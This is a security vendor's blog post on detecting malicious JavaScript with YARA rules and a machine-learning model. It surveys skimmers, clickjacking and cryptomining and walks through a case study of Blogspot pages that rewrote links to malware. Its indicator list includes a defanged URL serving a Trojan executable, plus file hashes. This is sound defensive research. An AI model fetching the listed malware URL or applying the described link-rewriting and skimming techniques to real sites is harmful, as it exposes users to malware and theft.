Detecting Malicious JavaScript with Secure Internet Access Enterprise Secure Web Gateway
Written by: Jordan Garzon
Introduction
Imagine a world without JavaScript. I can't count the number of times my colleagues and I have thought about this at some point in our careers, and as of right now, a world without JavaScript is hard to imagine. As someone who works in a company that has been dealing with JavaScript for several years now, I am well aware of its challenges, and just how prevalent it is in our industry. In fact, JavaScript protection remains a huge part of our mission, whether we like it or not.
JavaScript is everywhere. Every request to a website and mobile application loads dozens of lines of JavaScript code; every browser supports it. It’s so ubiquitous that it could easily be considered a critical technology, one that shapes the way websites are built and function. And, as we all know, in security, the more critical a technology, the more ways it can be used maliciously.
Since it is so pervasive, targeting and utilizing JavaScript provides adversaries the chance to create significant damage by abusing the huge attack surface that JavaScript provides. The potential impact of a large vector was illustrated by the Log4j vulnerability that was discovered in December 2021, an attack vector that provided immediate scale once exploited. Log4j, a Java library, provides logging capability — a basic functionality that almost all developers use. That’s the difference between JavaScript vulnerabilities and other vulnerabilities: its huge presence among production code.
With all this in mind, the ever-present question prevails: “So, what can we do about it?” After seeing the havoc wreaked by Log4j, we decided to try to definitively answer the question and launched an investigation to understand and detect malicious JavaScript. This led to the project I’m writing about today. Security research is always fun, and when we saw our theory worked, we took it a step further and tried out some real-world contextual situations.
In this blog post, I want to tell you about our investigation and the techniques we've used to identify and isolate malicious JavaScript in order to build a new capability in our product. It will include a review of the threat landscape when it comes to JavaScript-related threats, including system architecture, the applied algorithms, and a case study.
Malicious JavaScript threat landscape
Before we get into the meat of the project, let’s look at the landscape that makes malicious JavaScript such a notable threat vector. I’ve already mentioned its pervasiveness, but just how deep does this go? Understanding this factor really puts the project into perspective. Outlined below are some of the most prevalent attacks using JavaScript in the wild.
Browser exploit
I don’t have to tell you how big this threat is — browsers and browser plugins are a key element of anyone with a computer. A great example is showcased with The Browser Exploitation Framework Project, also known as BeEF. BeEF is a penetration test tool focused on web browsers — one of the biggest client-side attack vectors out there — which illuminates the exploitability quite well.
Skimmers
Skimmers are an infamous example of how cybersecurity can affect life outside of the corporate world and become very personal. Since JavaScript controls the Document Object Model, it is able to modify not only the generated HTML, but also the underlined HTTP requests. This can be seen in an action as simple as a user clicking on a button.
A real-world example of this can be derived from any site with associated digital commerce. If a malicious JavaScript is injected to a benign website, all credit card credentials captured by the skimmer can be redirected to the attacker. The most notable case of this was the 2018 Magecart attack on the British Airways website that stole approximately 380,000 credit card numbers.
Skimming has morphed since 2018. A common way this technique is used today is by replacing bitcoin addresses with the attacker’s address on a benign website as we saw with the Lazarus group in the past few years.
Clickjacking
Although operating on a benign website allows for wide dissemination, it is limited in scope compared with a server over which you maintain full control. If the attacker can make the user come to them, they’ve got home-court advantage. This allows for a significantly larger impact for the attacker. Once the victims land on their turf, the attacker can make them download malware, retrieve information from their browsing session, and perform many other malicious activities.
A classic way to do this is to create a transparent iframe on top of a legitimate one, giving the users a false sense of security when they click on it. This iframe redirects the users to the attacker-controlled server where the attackers can run their myriad malicious activities.
Unauthorized cryptomining
Cryptomining has gained a lot of attention in the past few years with the severe uptick in cryptocurrency used today. Why not use the user’s CPU to mine cryptocurrencies? Especially when it takes just one line of JavaScript. The most famous library for it was Coinhive, which was said to have shut down in 2019, but has of course since been replaced in examples like CoinIMP or CryptoLOOT.
Malicious JavaScript detection engine — architecture and algorithms
Now that I have walked you through the landscape, it’s time to get to what we created. There are two ways of inserting JavaScript into a website: by writing a JavaScript file in the same server, or by using an existing one from another source and inserting the link in the HTML page. On the proxy side, we will see two different HTTP requests, one for the HTML and one for the JavaScript file. By entering a single website, your browser can be performing hundreds of HTTP requests for rendering the entire website.
You can also write the JavaScript code within the HTML itself. Then, no additional requests are needed for retrieving it. When discussing how to detect malicious JavaScript, there needs to be a way to address both of these sides, which is what we created.
Our new engine is able to extract the “inline” JavaScript codes and scan them separately. Below is an extract of the source page from The New York Times showing these two types of JavaScript:
HTML code excerpt of The New York Times website (https://www.nytimes.com/) on February 2, 2022
Akamai Secure Internet Access Enterprise secure web gateway (SWG) is composed of different engines scanning the traffic in real time. It is also connected to our threat intelligence and enriched by our custom algorithms.
Let’s zoom inside the red box labeled “JS Models”:
Database
The models rely on a relational database to keep metadata and store the actual JavaScript code through a storage vendor.
The database includes a training set, i.e., our labeled data. The benign data is mainly coming from popular JavaScript seen in our traffic. The malicious data is filled with various sources: VirusTotal (VT), detections from other algorithms, and malicious code that we actually detect. Thus, it is constantly updated.
The DB also contains the test set, which is basically the last few days of traffic that we see over the proxy.
Model for real-time detection
To be able to detect malicious JavaScript in real time, we use YARA rules that we deploy on the edge. Those rules are created based on the training set. Since creating rules is not an easy task, we based an algorithm on this paper that automatically generates Yara rules. We adapted it to classify JavaScript code instead of binary, and changed the rules generation logic, which means we can update the malicious JavaScript engine running on SWG on demand.
Threat intelligence enrichment by machine learning model
A known problem that researchers have when catching JavaScript is obfuscation, a technique (also used by benign websites) that minifies the code and turns the code into gibberish. Or Katz wrote a blog post about this in October 2020.
To be able to detect them, we integrated our logic in a model inspired by JStap, which runs on the abstract syntax tree, a tree representation of the code, which is how we get around this technique.
A machine learning model can provide better accuracy than YARA rules. However, deploying it on the edge for real-time scanning is challenging. So, we landed somewhere in between. Our model is trained with the same training set, scans the traffic offline (on the Azure Machine Learning environment) and fills the threat intelligence with what it finds.
The threat intelligence is checked on every connection to the SWG — that way customers benefit from the machine learning model detection.
Seeing it in action — a case study
The best way to showcase this is by using a real-life example. On March 8, 2022, the machine learning model detected JavaScript hosted on cigarettesblog[.]blogspot[.]com.
This domain, as of March 10 2022, was showing 0 detections on VT.
In the following extract, the JavaScript code replaces all the HTML links with malicious URLs.
One of them hxxps://myprintscreen[.]com/soft/myp0912.exe, which has been now commented in the code, is actually downloading a Trojan (4a6ffa02ff7280e00cf722c4f2235f0e318e6cc8a2b9968639ba715f1a38c834), which has 23 detections on VT. There were some other URLs flagged as malicious by many vendors on VT.
This is a classic behavior of malicious JavaScript: replacing URLs on the pages, sending POST requests to other domains (see the extract below), or conducting a drive-by download attack for dropping malware on the user's machine.
URLs:
myprintscreen[.]com/soft/myp0912.exe
www[.]blog-hits.com
File hash:
4a6ffa02ff7280e00cf722c4f2235f0e318e6cc8a2b9968639ba715f1a38c834 (Trojan)
fc311d002d7139e0a58b00464731ba8d4faea4670cff9fedfb35057fe838c285 (JavaScript file uploaded by us on March 10)
Same mechanism has been detected on penis-photo.blogspot[.]com.br (on March 10) or mateyhderesa[.]blogspot.com (on March 13), playboy-college-girls.blogspot.sk (March 14).
Summary
As I said in the beginning of this post, anything critical for security can also be used maliciously, and something as prevalent as JavaScript can have some major consequences. It can also be quite difficult to decrypt; a previous blog post showed that 25% of the malicious code we see is obfuscated.That’s not an insignificant percentage, and considering how much of the internet we see, it’s quite representative of the expanse of this.
This research all began as a way to make our customers more secure, so we took what we found and applied it into our SWG. We have two new models: YARA-based and machine learning–based. The model based on YARA rules signatures scans any JavaScript code going through the SWG for real-time protection. The model based on machine learning double-checks the traffic to update the threat intelligence at the edge. Both models are constantly updated and retrained, and take into account the latest threats as well as the new benign JavaScript seen in the wild.